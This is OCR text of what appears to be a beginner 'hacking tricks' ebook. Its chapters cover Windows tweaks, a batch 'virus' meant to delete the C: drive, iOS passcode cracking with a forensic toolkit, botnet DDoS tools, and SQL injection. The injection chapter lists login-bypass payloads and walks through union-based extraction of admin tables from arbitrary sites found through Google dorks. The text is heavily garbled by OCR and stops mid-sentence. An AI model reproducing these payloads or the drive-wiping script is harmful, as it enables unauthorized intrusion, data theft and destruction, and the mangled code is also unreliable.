amingScore>5.2</GamingScore><StdDefPlaybackScore>TRUE</StdDef 
PlaybackScore><HighDefPlaybackScore>TRUE</HighDefPlaybackScor 
e><DiskScore>5.7</DiskScore><LimitsApplied><MemoryScore><LimitA 
pplied Friendly="Physical memory available to the OS is less than 
4.0GB-64MB on a 64-bit OS : limit mem score to 5.9” 
Relation="LT">4227858432</LimitApplied></MemoryScore></LimitsAppli 
ed></WinSPR><Metrics><CPUMetrics><CompressionMetric 
units="MB/s">191.95522</CompressionMetric><EncryptionMetric 
units="MB/s">95.28615</EncryptionMetric><CPUCompression2Metric 
units="MB/s">461.74589</CPUCompression2Metric><Encryption2Metri 


In the notepad window you 
don’t need to do too down to 


hunt anything, simply change 
the values according to your 
will in the upper area. The 
values are written between 
tags. Such as 


<МетогуЅсоге>5.9</Метог 


Change ће values between 
tags and save the files. Next 
time you will open the 
Windows< Experience Index 
the values will be changed. 


Rate and improve your computer's performance 


The Windows Experience Index assesses key system components on a scale of 10 to 79. 


Component 

Processor: 

Memory (RAM): 

Graphics: 

Gaming graphics: 

Primary hard disk: 
"7 “ 


—/ 


Learn more about 


& onlin 
м # 


Your scores are current 


What is rated 


Calculations per second 
Memory operations per second 


Desktop performance for Windows 
Aero 


3D business and gaming graphics 
performance 


Disk data transfer rate 


What do these numbers mean? 


jw Tips for improving your computer's 
WI») performance 


cores and software 


Subscore 


76 
72 


77 


72 


75 


Base score 


Determined by 
lowest subscore 


View and print detailed performance and 
PP system information 


@Re-run the assessment 


OFF THE ROAD TIP: For 
more fun we suggest 


everyone to keep their Scores 
realistic (Not 7.9 Exactly) 


To revert the changes you can 
re-run the assessment. 


THE HIDDEN 
DRIVES 


HACK TO HIDE 
LOCAL DRIVES 


In this article we are going to 
learn about hiding the stuffs. 
Generally, you guys use to 
hide the particular file which 
you want to keep personal. 


Which is the most common 
way ш these days and it can 
easily be exposed even by a 
middle school child. 


But, here we are going to 
learn that how to hide the 
whole specified drives (local 
disks) which keep you safe 
from your family child. You 
can easily keep your data safe 
either it 1$ your girlfriend’s 
pic or blah...blah...blah...! 


Let’s start to learn how to 
hide the specified drives step 
by step:- 


For hiding the drives you 
have to edit the group policies 
of your computer. 

For editing group policies 
just go on the “run” option 
and type “gpedit.msc” and 
click on ok. 

Or 

You can easily search in your 
search box for the GROUP 


POLICY. 


7 Run Ба 


» Туре the name of a program, folder, document, ог 
— Internet resource, and Windows will open it for you. 


Open: | gpedit.msc v 


OK Cancel Browse... 


The group policy editor will 
be opened after you! 


Then you will see in the left 
part of the window there is a 
“USER 


CONFIGURATION” option. 
Under the user configuration 
option there are three options 
:1.) Software settings 
2.) Windows settings 


3.) Administrative templates 


Just give a single click on the 
administrative template 
option. You see that some 
options are made available in 
the right part of the window. 
Open the “all settings 
option.” 


Administrative Templates 


Select an item to view its 
cription. 


When you opened the “all 
settings options” there is a list 
of lot of options displayed 
after you! 

Clickon the “settings” 
option to arrange them then 
alphabetically. If already 


arranged you can skip this 
Step. 


ings 

1 to view its Setting р State Comment Path 
1) .Net Framework Configuration Not configu... No Winc 
15 Ability to change properties of an all user remo... Not configu. No \Мем 
1 Ability to delete all user remote access connecti.. Not configu. No \Мем 
15 Ability to Enable/Disable a LAN connection Not configu. No \Netw 
1) Ability to rename all user remote access connec... Not configu. No \Мем 
1: Ability to rename LAN connections Not configu. No \Netw 
1: Ability to rename LAN connections or remote a.. Not configu. No \Мем 
1) Access data sources across domains Not configu. No \Wine 
1) Access data sources across domains Not configu. No Winc 
1) Access data sources across domains Not configu... No Winc 
1 Access data sources across domains Not configu. No Winc 


Now clicking sometimes the 
“Н” key of your keyboard 
search for the "hide these 
specified drives in my 


computer” option. 


^ 


Hide these specified drives Setting State ' 


їп My Computer I Hide the geographic location option Not configu... 
^ + Hide the notification area Not configu... 

Edit policy setting. © Hide the Programs Control Panel Not configu... 
Requirements: + Hide the Security page Not configu... 
At least Windows 2000 t: Hide the select language group options Not configu... 
=) Hide the Set Program Access and Defaults page Not configu... 

Description: А =) Hide the status bar Not configu... 
bes Hep енп = Hide the Video page Not configu... 


drives in My Computer. : 
= Hide user locale selection and customization o.. Not configu... 


This policy setting allows £ Hides the Manage item on the File Explorer con.. Enabled 
you to remove the icons IAS Logging Not configu... 
representing selected hard 1 Identity Manager: Prevent users from using Iden... Not configu... 
drives from My Computer = я à 
and File Explorer. Also, the 4 IGMP Routing Not configu... 
drive letters representing E Ignore custom consent settings Not configu... 


Double click on the “hide 
these specified drives in my 
computer" option. 

A window will opens after 
you. 


К Hide these specified drives in My Computer Previous Setting Next Setting 


Not Configured Comment: 


©) Enabled 


2 Disabled А 
Supported оп: | At least Windows 2000 


Options: Help: 


Pick one of the following combinations This policy setting allows you to hide these 
specified drives in My Computer, 

Restrict A, B, C and D drives only v 
This policy setting allows you to remove the icons 
representing selected hard drives from My 
Computer and File Explorer. Also, the drive letters 
representing the selected drives do not appear in 
the standard Open dialog box. 


If you enable this policy setting, select a drive or 
combination of drives in the drop-down list. 


Note: This policy setting removes the drive icons. 
Users can still gain access to drive contents by 
using other methods, such as by typing the path to 


OK Cancel 


"ENABLE" it and choose 
for the drives which you want 
to hide from the given options 
in the lower left part of the 


window. 

After applying the settings 
just click on ok and you see 
the drives will hide according 
to your choice. 

I have selected to hide only 
A, B, C and D drives only so 
the E: drive will not be 
hidden in the screenshot 
given below. 


In the above given 
screenshot опу “Е?” drive is 
shown to the user. 

If you want to access the 
drives which are hidden then 
you have to click on the 
address bar of my computer’s 


window as marked in the 
above screenshot and type 
D:" or “С?” and click on 
ENTER button of your 
keyboard to open the drives 
respectively. 


EMPTY HDD 


FORMAT HARD 
DISK WITH 
NOTEPAD 


In this article we are going to 
learn how to delete 
completely your C: drive of 
your computer without a 
formatting compact disk. Just 


do it on your own risk 
because it will destroy the 
windows of you system and 
for this I am not responsible. 


FOLLOW THE BELOW 
STEPS TO FORMAT YOU 
C: DRIVE: _ 

Open the notepad and type 
the following give code 


CODE: 
@echo off del C^ *.* \y 


File Edit Format View Help 


@echo off 
del CA *.* \у 


Save it with the extension 
* bat" 


Such as “‘virus.bat’’. 


Save As 


€ t Шое › 
Organiz New fc e 
Fave 4.7 
4 № 
De: 
= a 
h D 
$5 R +8 Homegn 
Libr 
Ujjwal Sah 
Documents 
$. Music 
P Computer 
8 
Ре м adl Network 
File name: virus.bat 
Save as type: А 
Hide Folders Encoding: ANSI ~ Save Cancel 


Double click on the saved 
file to run this virus. 
Command prompt will be 
opened after you where it will 
be deleting your drive. 
Note: “I have not tried this 


virus yet, and also please 
don’t try on your 
personalcomputers. If you 
have triedever please give me 
the reviews.” 


LET’S HAVE 
SOME FUN 


FUNNY VIRUS TO 
SHOCK YOUR 
FRIENDS 


Hello guys, I think after 
reading the above chapters 
now it’s time to have some 
fun. In this article we are 


going to learn that how to 
give a shock to your friend 
for a minute. 


Basically here we are going 
to create a funny virus which 
will not actually harm your 
friend’s computer but it will 
shock him/her for a minute. 


So let’s create that virus 
following the same steps as 
we have created some viruses 
in previous chapters. 


So follow the steps: 
Open the notepad and type 
the following code: 


CODES: 

@echo off 

msg * your computer is 
attacked by a virus. 

msg * click ok to format. 
msg * all your data has been 
deleted. 


Save the document with the 
extension *.bat" 

For example you can save 
the virus by the name "funny 
virus.bat" 


Save As 


< ^ Ш Desktop 
Organiz New folder 
^ 
X Favorites Sirs |. 
5 ш 
De 
ш -a 
№ Dow 
& Rec s g À Homegroup 
J Libr. 
Ujjwal Saha’ 
D li 
4. M 
5 Pict Computer 
8 video 
2 - z: Wag. Network 
File name: funny virus.bat 
E type: АП Files 


Encoding: ANSI м Ѕауе 


Now your work is to execute 
the virus. 

Just double click on the virus 
and it will show you a 
message that 


"your computer is attacked by 
a virus". 


Message from chandracomputers 11/7/2014 9:09 AM X| 


your computer is attacked by a virus. 


OK 


Now either you click on “оК” 
or you close the above 
message box, it will again 
show you a message “click ok 
to format". 

And I am sure that you will 
not going to click on ok. 


But again it does not matter 
if you click on ok or close the 
box, but I am sure that you 
will close the box. 

Again it will show you a 
message that “all your data 
has been deleted". 

And for a moment your 
friend's heartbeat are going to 
be on the optimum. 


So this is a funny way to 
shock your friends without 
harming them actually. 


DO YOU HAVE 
17 


s 


HOW TO CHANGE 
YOUR PROCESSOR 
NAME 


The trick we are going to 
learn here is the most 
interesting trick and I am sure 
that it will increase your 
prestige among your friends. 
Because now these days it’s a 
big deal among the group of 
your friend that if you have 
13, 15 or 17 processor. 

So let’s learn how to change 
your рс from any of core 
processor to 17. 


For it you have to follow 


these steps: 


First of all you have to go on 
the “тип” option and write 
“regedit” to open the registry 
editor of your computer and 
click on ok 

It will open the registry 
editing window after you. 


Е у es 


№; Computer Ne Type раа 
|} HKEY_CLASSES_ROOT b t REG SZ 
KEY_CU USER 
|. HKEY LOCAL MACHINE 
А. HKEY. USERS 


J HKEY CURRENT, CONFIG 


Open the 
"HKEY LOCAL MACHINE 
as highlighted in the figure. 


File Edit View Favorites Help 

4 № Computer Name Type Data 
№ HKEY. CLASSES ROOT aU) (Default) REG. SZ 
|. HKEY. CURRENT. USER 7 

4 |}. HKEY LOCAL MACHINE 

BCD00000000 

HARDWARE 

SAM 

SECURITY 

SOFTWARE 

SYSTEM 

JL HKEY. USERS 

|} НКЕҮ CURRENT CONFIG 


(value ı 


Е 


Then open the “hardware” 
option present under it. 


File Edit View Favorites Help 
4 № Computer Name Type 
| HKEY CLASSES ROOT ab) (Default) REG SZ 
JÈ HKEY. CURRENT. USER : 
4 [I HKEY. LOCAL MACHINE] 
+ BCD00000000 
4-|. HARDWARE 
| АСР! 
J DESCRIPTION 
{+ DEVICEMAP 
+ RESOURCEMAP 
А SAM 
Lk. SECURITY 
Ll. SOFTWARE 
J SYSTEM 
J HKEY USERS 
|} HKEY CURRENT CONFIG 


Then open the “Description” 
option and then open the 
"system" option. Also open 
the "central processor" option 
under system option. 


Bo Registry Editor | 
File Edit View Favorites Help 
4 Ж Computer Name Type Data 
|. HKEY CLASSES ROOT ж (Default REG SZ 
|. HKEY CURRENT USER т 
«|| HKEY_LOCAL MACHINE 
№ BCD00000000 
4 |. HARDWARE 
| АСР! 
4 |. DESCRIPTION 
4 stem 


Lk. System 
k. BIOS 
4 |. Centr 
ko 
k 1 
FloatingPointP! 
+ MultifunctionAdap! 
VideoAdap 


DEVICEMAP 
+ RESOURCEMAP 
E eaa 


Then give a single click to 
“0” folder present under 
“central processor”. 

And then you will see that in 
the right part of the regedit 
window there appear a lot of 
options. This is called as 


STRINGS. 

Search for the “processor 
name string” among those 
strings. 


Open the processor name 
string giving a double click 
on it. A dialogue box will 
open after you. 

In the “value data” text box 


it 18 written what your 
computer’s processor actually 
15. 


# Registry Editor 


I am using “Pentium(R) 
Dual-Core CPU T4500 @ 
2.30GHz” as written in the 
value data. 

Now delete those texts and 
write your own text replacing 


them. 

Such as you can 

write’ Intel(R)Core 17CPU 
T9500 @ 2.30GHz” and click 
on “ok” option. 


Value name: 
Processor NameString 


Value data: 


Intel(R) Corei7 CPU — T9500 8230GHz = = 


Now close the registry editor 
and let's checkif it is working 
or not. For checking it, you 


have to check the properties 
of your computer. 

For checking it, just give a 
right click on my computer 
icon and click on the 
“properties” option which is 
the last option of the dialogue 
box. 


4 Devices with Removable Storage (1) 


4) Libraries ба 
3, Documents P tun DVD RW Drive (F:) 
$, Music 
Æ, Pictures 
A Videos 


аф Homegroup 


4 & Computer 
> Local Disk(E Collapse 


Open in new window 


4 & Network Pin to Start 


МЫ YOOZAY Map network drive... 
Disconnect network drive... 


Add a network location 


Delete 
Rename 


The system properties of 
your computer are shown 
after you. 


System 


АШ Windows 8 


Yuppie! As you have seen in 
the processor name it will be 
as expected. 

Now your processor is turned 
into 17. 


And now you can say with 


proud that YOU HAVE А 
CORE 17 PROCESSOR. 


GOOGLE 


HOW TO MAKE 
YOUR GOOGLE 
SEARCHS 
EFFECTIVE 


In this article we are going to 
learn how to make our 
Google searches effective. If 
we have to find anything on 


Google we use to open the 
Google website and start 
searching like if you want to 
download any book on 
Google you use to write like 
this “fifty shades of grey for 
free”. And you will find a 
huge amount of results on 
Google like 753286543567 
results in 0.43 seconds and 
will make you difficult to find 
the exact working download 
link of that book. 


You can take some very 
simple steps to reduce your 
Google searches results. 
Let’s assume we have to 
download the same book as 
above mentioned. 

If you use to write ш the 
following way it will reduce 
your Google searches and 
make it simple to find the 
exact download link. Write in 
this way in the Google 
searches: 

You have to write your 


searches under double quotes. 
Like: - “fifty shades of 
grey.pdf" 

Note: - don't forget to apply 
the extension ".pdf" 


Second method: - using 
"GOOGLE HACKS" You 
can also use an application 
name as *Google hacks". It is 
easily available on the net and 
you can download it easily by 
Google searches. 


This application also helps 
you a lot in performing 


effective searches. Ё 


iOS 
PASSWORD 
CRACKING 


IOS PASSWORD 
CRACKING 


Now these days' people 
generallyuse 4-digit pin to 
secure their phone. A mobile 


device gets lost or stolen and 
all the person recovering it 
has to do 1$ try some basic 
number combinations such as 
1234, 1212, or 0000.and soon 
the will be unlocked. 


Let’s see how to crack your 
10$ password: 

1. For the first step you have 
to plug you iPhone or 
computer into device 
firmware upgrade mode 1.e. 
DFU mode: 


To enter DFU mode, simply 
power the device off, hold 
down the Home button 
(bottom center) and sleep 
button (upper corner) at the 
same time for 10 seconds, 
and continue holding down 
the Home button for another 
10 seconds. The mobile 
device screen goes blank. 


2. after putting your phone 
into DFU mode you need to 
Load the 105 Forensic 


Toolkit for this you need to 
insert your USB license 
dongle into your computer 
and running Tookit.cmd: 


C:\Windows\system32\cmd.exe 


3.After that the work is to do 
is to load the 10$ Forensic 


Toolkit Ram disk onto the 
mobile device by selecting 
option 2 LOAD 
RAMDISK:When you loaded 
the RAMDISK code it allows 
your computer to 
communicate with the mobile 
device and run the tools 
which are needed for 
cracking the password 
(among other things). 


4. Now you need to select the 
105 device type/model that is 


connected to your computer, 
as shown 1п Figure: 


I don’t have iphone 6 with me 
now so; I have selected 


option 14 because I have an 
iPhone 4 with GSM. 


ms C:\Windows\system32\cmd.exe 


Welcome to Elcomsoft 10$ Forensic Toolkit 
This is driver script version 1 Min 


<с> 2011-2012 Elconsoft Co. Ltd. 


device currently connected: 
iPhone 
LiPhonei,1] - iPhone 
(iPhone iPhone 3 
[iPhone iPhone 
iPhone 
iPhone 4 


iPod 
L[iPodi,i 
LiPod2,1 
LiPod3,1 
LiPod4,1 


1 iPod 

1 iPod <2 neration> 
1 iPod 43r ation? 
1 


iPod <4 ation? 


iPad 
LiPadi,11 iPad list Generation? 


Back 


After that you see the toolkit 
which is connecting to the 
device and it confirms a 
successful load, as shown ш 
Figure: 


Also you will see the 
Elcomsoft logo ш the middle 
of your mobile device’s 
SCLCEM „м. I think it looks 
pretty: 


з C:\Windows\system32\cmd.exe 


y for device Р to connect... 
device in DFU mode 
shecking if device is compatible with this jailChecking the device type 


linerain exploit 
iPhone3,1 


device to pop up... 
Forenisc Toolkit\common\iBS$ .n9@ to device 
1 100.0; 


laiting 5 seconds с device to pop up... 

Uploading C:\kb\tools\i0S Forenisc Toolkit\common\iBEC.n9@ to device... 
[ 1@й.йх 

aiting 10 seconds for the device to pop up... 

Exiting libpois@n 


tarting Loader... 


Waiting for a device in Recov mode to connect.. 

Ramdisk C:\kb\tools\i0$ For sc Toolkit\conmon\randisk-5.dng loaded 
Devicetree C:\kb\tools\i0$ Ро i Toolkit\common\DeviceTree.n9@ loaded 
Kernelcache C:\kb\tools\i0S Forenisc Toolkit*conmon*kernelcache.n98 loade| 


wait until device intialized... 


our 10$ device should now boot. 
If everything went well, 108 device should show 
Elconsoft logo. 


If you do not see Elconsoft logo (e.g the screen is all white 
or all black and there is spinning indicator at the 
otton of the screen) then sonething went wrong. Ple 

and contact Elcomsoft support if problenm persis 


*Enter’ to continue 


6. Now if you want to crack 
the device's password/PIN, 


you have to simply select the 
option 6 GET PASSCODE 


on the main menu: 


105 Forensic Toolkit will 
prompt you to save the 
passcode to a file. For saving 
the passcode simply; you can 
press Enter to accept the 
default of passcode.txt. The 
cracking process will 
commence and, with any 
luck, the passcode will be 
found and displayed after you 
as shown in Figure: 


ms C:\Windows\system32\cmd.exe 


Welcome to Ele oft 10$ Роке Toolkit 
This is driver script version 1.15/Win 


<с> 2011-2012 Elconsoft Co. Ltd. 


Please note that J code for 10$ 4/5 device you need 
load rand E iOS device first. If you haven't done 
yet, please return to preuiou ep and use corresponding пепи 


Continue? (Y/n): y 
Save passcode to file <relative to current directory) <passcode.txt> 


lounting user partitio 
jount_hfs: Resource busy 


Starting passcode recovery... 


This is 105 Passcode Recovery 
Part of Elconsoft 10$ Forensic Toolkit 
0 1.15 built on Jun 4 2012 


<c) 2011-2012 Elconsoft Co. Ltd. 


Device Serial Munber: 79121003027 

Probable passcode type: Ø - simple passcode (4 digits). 
Simple pa de, using length=4 

Passcode all-digit, filtering out non-digits from charset. 
Passcode recovery: KB version: 3; KB type: 0x88e00800 
Passcode recovery: checking common PINs... 


CUR PASS: Г 1202 1 1 AUG SPD: 3.6 p/s ! ELAPSED TIME: 7.0 = 
[INFO] P. ode found: 1212 


Pre 'Enter' to continue 


So, having no password for 
phones and tablets is bad, and 
a 4-digit PIN such as this is 
also not much better choice. 


So be aware about the 
attacks! Get up-users-getup 
it’s time to be secured. 

You can also use 10S 
Forensic Toolkit to copy files 
and even crack the key chains 
to uncover the password that 
protects the device’s backups 
in iTunes (option 5 GET 
KEYS). 


PREVENTION: 
For the prevention from being 
hacked you can refer to the 


chapter “PASSWORD 
CREATING POLICIES”. 


HIDE YOUR 
RECYCLE BIN 


HACK TO HIDE 
THE RECYCLE BIN 


Sometimes when you just try 
to modify the windows GUI 
or even you use to install any 
theme for your windows 
sometimes you find that the 


recycle bin icon remains not 
modified and destroys the 
beauty of your modification. 


So in this article we are going 
to learn that how to delete the 
RECYCLE BIN by hacking 


registry. 


For deleting the recycle bin 
you need to open the registry 
editor of your computer. 

I think now after reading the 
above sections you are 


familiar with the “registry 
editor". 

So go through the registry 
editor and follow the given 
path. 


HKEY LOCAL MACHINE 


HKEY LOCAL MACHINE 
00AA00 2F954E! 


When you finally opened the 
last path, you will see the 
default string of recycle bin is 


defined. 

Now DELETE that string 
and restart your computer. 
You will find that recycle bin 
is deleted. 

I am attaching a screenshot 
for your ease. 


By finalizing all steps don’t 
forget to restart your 
computer. 

It will work only on the 
restart. 


att © 


HOW BOTNET 
DDoS ATTACK 
WORKS... 


ack 


DDoS Attack? 


DDoS stands for “Distributed 
Denial of Service." A DDoS 
attack is also a malicious 
conceive to produce a server 
or a network resource 
inaccessible to users, 
normally by quickly officious 
with or suspending the 
administrations of a host 
related to the net. In contrast 
to a Denial of Service (DoS) 
attack, inside that one 


computer and one internet 
association 1$ used to flood 
targeted resource with 
packets, a DDoS attack uses 
many computers and lots of 
internet connections. DDoS 
attacks is loosely divided into 
three different types. The 
first, Application Layer 
DDoS Attacks embrace 
Slowloris, Zero-day DDoS 
attacks, DDoS attacks that 
consider Apache, Windows 
or OpenBSD vulnerabilities 


and extra. Comprised of 
Seemingly legitimate and 
innocent requests, the goal of 
these attacks 15 to crash the 
net server, and additionally 
the magnitude is measured in 
Requests per second. The 
second kind of DDoS attack, 
Protocol DDoS Attacks, 
along with SYN floods, 
fragmented packet attacks, 
Ping of Death, Smurf DDoS 
and extra. This sort of attack 
consumes actual server 


resources, or those of 
intermediate facility, like 
firewalls and load balancers, 
and is measured in Packets 
per second. The third kind of 
DDoS attack 15 usually 
thought-about to most 
dangerous. Volume-based 
DDoS Attacks embrace UDP 
floods, ICMP floods, and 
different spoofedpacket 
floods. The volume-based 
attack’s goal is to saturate the 
information measure of the 


attacked web site, and 
magnitude is measured in 
Bits per second. 


att ack 


Botnet? 


Sometimes observed as a 
“Bunch of Zombies," а 


Botnet may be a cluster of 
Internet-connected 
computers, every of that has 
been maliciously condemned, 
sometimes with the help of 
malware like Trojan Horses. 
Usually while not the data of 
the computers’ rightful 
homeowners, these machines 
Square measure remotely 
controlled by an external 
source via commonplace 
network protocols, and often 
used for malicious functions, 


most ordinarily for DDoS 
attacks. 


Botnet Tools 


The conceiver of a Botnet 15 
often brought u p as a “bot 
herder” or “bot master.” This 
individual controls the Botnet 
remotely, usually through 
associate IRC server or a 
channel on a public IRC 
server — referred to as the 
command and control (C&C) 


server. To communicate with 
the C&C server, the bot 
master uses numerous hidden 
channels, as well as 
apparently innocuous tools 
like Twitter or IM. A lot of 
advanced bots automatically 
hunt down a lot of resources 
to exploit, joining a lot of 
systems to the Botnet during 
a process referred to as 
"scrumping." Botnet servers 
might continually 
communicate and work with 


different Botnet servers, 
making entire communities of 
Botnet’s, with individual or 
multiple bot masters. This 
implies that any given Botnet 
DDoS attack may very well 
have multiple origins, or be 
controlled by multiple people, 
generally operating in 
coordination, generally 
operating singly. Botnets area 
unit obtainable for rent or 
lease from numerous 
sources,anduse of Botnet’s 


are auctionedandlistedamong 
attackers. Actual 
marketplaces have sprung up 
— platforms that modify 
commercialism in large 
numbers of malware-infected 
PCs, which might be rented 
and employed in Botnet 
DDoS or different attacks. 
These platforms offer Botnet 
DDoS attack perpetrators 
with an entire and richly- 
featured toolkit, and a 
distribution network 


additionally.Even for non- 
technical users, Botnet DDoS 
attacking may be a viable and 
efficient choice to “take out” 
a competitor’s web site. At 
intervals the crime system, 
Botnet DDoS attacks area 
unit a thought artifact, with 
costs taking place, and 
effectiveness and class 
growing. A number of the 
foremost common tools for 
initiating a Botnet DDoS 
attack are simply downloaded 


from multiple on-line 
sources, and include: 


SlowLoris 


Especially dangerous to hosts 
running Apache, dhttpd, 
tomcat and GoAhead 
WebServer, Slowloris may be 
a highlytargeted attack, 
enabling one internet server 
to require down another 
server, while not touching 
different services or ports on 


the target network. 
Tor’s Hammer 


Is a slow post dos testing tool 
written in Python. It also can 
be run through the Tor 
network to be anonymized. 
There are several tools for 
testing server readiness to 
resist Botnet DDoS attacks. 


Qslowloris 
Uses Qt libraries to execute 


the ways utilized by 
Slowloris, providing a 
graphical interface that 
creates the program highly 
simple to use. 

Apache Killer 


Utilizes an exploit within the 
Apache OS initial discovered 
by a Google security 
engineer. Apache Killer pings 
a server, tells the server to 
interrupt up whatever file is 
transferred into a huge range 


of little chunks, using the 
“range” variable. When the 
server tries to adjust to this 
request, it runs out of 
memory, or encounters 
alternative errors, and 
crashes. 


PyLoris 

It is a scriptable tool for 
testing a service’s level of 
vulnerability to a specific 
category of Denial of Service 
(DoS) attack 


DDoSim 


Which can be employed in a 
laboratory atmosphere to 
simulate a DDoS attack, and 
helps live the capability of a 
given server to handle 
application-specific DDOS 
attacks, by simulating 
multiple zombie hosts with 
random IP addresses that 
create transmission control 
protocol connections. 


Botnet DDoS Attacks 


Botnet DDoS attacks are 
quickly turning into the 
foremost prevailing variety of 
DDoS threat, growing 
speedily within the past year 
in each number and volume, 
consistent with recent 
marketing research. The trend 
is towards shorter attack 
period, however larger 
packet-per second attack 
volume, and therefore the 


overall variety of attacks 
according has grownup 
markedly, as well. The 
typical attack information 
measure ascertained 
throughout this era of 2010- 
2012 was five.2G bps, which 
is 148% above the previous 
quarter. Another survey of 
DDoS attacks found that 
quite 400th of respondent’s 
old attacks that exceeded 1G 
bits per second in bandwidth 
in 2011, and 13 were targeted 


by a minimum of one attack 
that exceeded 10G rate. From 
a motivational perspective, 
newer analysis found that 
ideologically driven DDoS 
attacks are on the increase, 
supplanting monetary 
motivation because the most 
frequent incentive such 
attacks. 


WEBSITE 
HACKING 


WEBSITE 
HACKING 


Now take your time and be 
serious and free before 
starting this article because 
this is the very wide and one 
of the most interesting 


articles among all of the 
above chapters. We will 
discuss in this chapter that 
how to hack any vulnerable 
site using SQL injection. 


What is SQL Injection? 


SQL injection is one of the 
popular web applications 
hacking method. Using the 
SQL Injection attack, an 
unauthorized person can 
access the database of the 


website. Attacker can extract 
the data from the Database. 


What a hacker can do with 
SQL Injection attack? 


* ByPassing Logins 

* Accessing secret data 

* Modifying contents of 
website 

* Shutting down the My 
SQL server 


So, here we start with 


bypassing login ....... i.e. 
Authentication bypass: 


In this type of SQL injection 
generally if we had found the 
Admin login page and after 
that we will try to open the 
control panel account of the 
admin by passing the 
authentication. 

If you have the admin login 
page of any website then you 
can paste the following codes 
(with quotes) to bypass the 


authentication of the website 
....generally PHP websites 
are vulnerable to this 
injection: 


You can find these types of 
sites simply by Google 
searches. You have to type 
like this in the Google search 
bar: 


www.thesitename.com/adminl 
Or /admin.php? Or Wp- 
login.php? Etc. 


After finding the login page 
you have to paste the 
following codes 1п both 
userID and password of the 
admin page till it will 
bypassed. If not we will try 
the next SQL injection 1.e. 
union based, blind based, 
error based etc. 


Codes to be used as both 
userID and password at the 
admin login page of 
vulnerable website for 


bypassing authentication are 
as follow: 


1'1] ° or °x’="x © or 
0=0 —” or 020 — or 0=0 
—‘ or 0=0 # ог 020 # 
or 0=0 # * or ‘х’=хХ ” or 
E din х“) or (*x’="x 

*orl-l-"or 1=1— or 
1=1— * or a-a- ” or 
"a" —"a 5) or ('a'-'a *) or 
(“а”=”а hi" or "*a"—"a hi" 
or 1=1 - h?’ or 121 — 
‘or’ 1=1' 


If the authentication bypass 
will not work then try the 
following techniques 
carefully and step by step: 
UNION BASED SQL1: 
Finding Vulnerable Website: 


To find a SQL Injection 
vulnerable site, you can use 
Google search by searching 
for certain keywords. That 
keyword often called as 
“GOOGLE DORK”. 


Some Examples: 
inurl:index.php?id- 
inurl:gallery.php?id- 
inurl:article.php?id= 

inurl:pageid= 


Now you have to Copy one of 
the above keyword and 
Google it. Here, we will get a 
lot of search results with 
which we have to visit the 
websites one by one for 
finding the vulnerability. 


For example: 
site:www.anyselectedsite.com 
inurl:index.php?id- Step 1: 
Findinging the Vulnerability: 


Now let us the vulnerability 
of the target website. To the 
vulnerability, add the single 
quotes(') at the end of the 
URL and press enter. 


For eg: 


http://www.anyselectedsite.coi 


id=2' 

If the page remains in same 
page or showing that page not 
found, then it is not 
vulnerable. 

If you got an error message 
just like this, then it means 
that the site is vulnerable. 


You have an error in your 
SQL syntax; the manual that 
corresponds to your MySQL 
server version for the right 
syntax to use near '\" at line 1 


Step 2: Finding Number of 
columns ш the database: 
Great, we have found that the 
website is vulnerable to SQLi 
attack. 

Our next step is to find the 
number of columns present in 
the target Database. 

For that replace the single 
quotes(') with "order by n" 
statement. 

Change the n from 
1,2,3,4,,5,6,...n. Until you get 
the error like "unknown 


column ". 


For eg: 
http://www.anyselectedsite.co: 
id=2 order by 1 
http://www.anyselectedsite.co: 
id=2 order by 2 
http://www.anyselectedsite.co: 
id=2 order by 3 
http://www.anyselectedsite.co: 
id=2 order by 4 If you get the 
error while trying the "n"th 
number, then number of 


column is "п-1". 

I mean: 
http://www.anyselectedsite.co: 
id=2 order by 1(по error 
shown shown) 
http://www.anyselectedsite.co: 
id=2 order by 2(no 


error shown) 
http://www.anyselectedsite.co: 
id=2 order by 3(no 

error shown) 
http://www.anyselectedsite.co: 
id=2 order by 4(no 


error shown) 
http://www.anyselectedsite.co: 
id=2 order by 5(no 

error shown) 
http://www.anyselectedsite.co: 
id=2 order by 6(no 

error shown) 
http://www.anyselectedsite.co: 
id=2 order by 7(no 

error shown) 
http://www.anyselectedsite.co: 
id=2 order by 8(еггог 

shown) 


So now n=8, the number of 
column is п-1 1.е., 7. 


In case, if the above method 
fails to work for you, then try 
to add the "--" at the end of 
the statement. 

For eg: 


http://www.anyselectedsite.co: 
id=2 order by 1-Step 3: Find 


the Vulnerable columns: 


We have successfully found 


the number of columns 
present 1п the target database. 
Let us find the vulnerable 
column by trying the query 
"union select columns 
sequence". 


Change the id value to 
negative (1 mean 1d—-2). 
Replace the 

columns sequence with the 
no from 1 to n-1(number of 
columns) separated with 
commas (,). 


For eg: 


If the number of columns is 7, 
then the query is as follow: 
http://www.anyselectedsite.co: 
id=-2 union select 1, 
2,3,4,5,6,7— 


Ifyou have applied the above 
method and is not working 
then try this: 
http://www.anyselectedsite.co: 
id=-2 and 1=2 union select 
1,2,3,4,5,6,7- 


Once you execute the query, 
it will display the vulnerable 
column. 


Bingo, column '3' and "7' are 
found to be vulnerable. Let us 
take the first vulnerable 
column '3' . We can inject our 
query in this column. 

Step 4: Finding 
version,database,user 


Replace the 3 from the query 
with "version()" 

For eg: 
http://www.anyselectedsite.co: 
id=-2 and 1=2 union select 1, 
2, version(),4,5,6,7— 

Now, It will display the 
version as 5.0.2 or 4.3. 
Something likes this. 
Replace the version () with 
database () and user() for 
finding the database,user 
respectively. 

For eg: 


http://www.anyselectedsite.co: 
id=-2 and 1=2 union select 
1,2,database(),4,5,6,7- 
http://www.anyselectedsite.co: 
id=-2 and 1=2 union select 
1,2,user(),4,5,6, 7- 

If the above is not working, 
then try this: 
http://www.anyselectedsite.co: 
id=-2 and 1=2 union select 
1,2,unhex(hex(@@version)),4 


Step 5: Finding the Table 
Name 


If the Database version 1$ 5 or 
above. If the version is 4.x, 
then you 

have to guess the table names 
(blind sql injection attack). 
Let us find the table name of 
the database. Replace the 3 
with 

"group concat(table name) 
and add the "from 
information schema.tables 
where 

table schema-database()" 


For eg: 


http://www.anyselectedsite.co: 
id=-2 and 1=2 union select 
1,2,group_concat(table name) 
from 

information schema.tables 
where 

table schema-database()- 


Now it will display the list of 
table names. Find the table 
name which 15 related with 
the admin or user. 


ry_comments, gallery gro 


Let us choose the "admin " 
table. 

Step 6: Finding the Column 
Name 

Now replace the 

"group concat(table name) 
with the 

"group concat(column name) 


Replace the "from 
information schema.tables 


where 

table _schema=database()--" 
with "FROM 

information schema.columns 
WHERE 

table name-mysgqlchar— 


We have to convert the table 
name to MySql CHAR() 
string . 

Install the HackBar addon 
from: 
https://addons.mozilla.org/en- 
US/firefox/addon/3899/ 


Once you installed the add- 
